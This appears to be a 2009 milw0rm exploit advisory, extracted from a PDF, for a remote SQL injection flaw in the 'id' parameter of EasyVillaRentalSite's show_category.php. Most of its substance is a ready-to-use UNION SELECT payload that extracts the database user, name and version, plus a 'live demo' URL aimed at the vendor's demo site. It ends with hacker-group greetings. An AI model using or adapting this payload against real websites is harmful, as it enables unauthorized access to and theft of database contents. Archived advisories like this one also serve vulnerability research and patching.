EasyVillaRentalSite Id Remote SQL Injection Vulnerability.pdf

1 ======================================================== 2 3 ==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability 4 5 ======================================================== 6 7 ==> AuThOr : BazOka−HaCkEr 8 9 ==> EmaiL : wuo@hotmail.com 10 11 ==> HomE : www.TrYaG.cc/cc 12 13 ======================================================== 14 15 ==> Product Page : 16 17 ==> http://easyvillarentalsite.com 18 19 ==> ExplO!te : 20 21 ==> show_category.php?Id=−2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,ver sion())−− 22 23 ==> L!ve D3mo : 24 25 ==> http://easyvillarentalsite.com/demo/show_category.php?Id=−2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,user(),0x3a,database(),0x3a,version())−− 26 27 ========================================================= 28 29 ==> GreeTz : 30 31 ==> FeezO , Abu−Mahdi , MoGaTiL , Str0ke , TrYaG TeaM 32 33 ========================================================= 34 35 # milw0rm.com [2009−07−09] Page 1/1 EasyVillaRentalSite Id Remote SQL Injection Vulnerability BazOka−HaCkEr 07/09/2009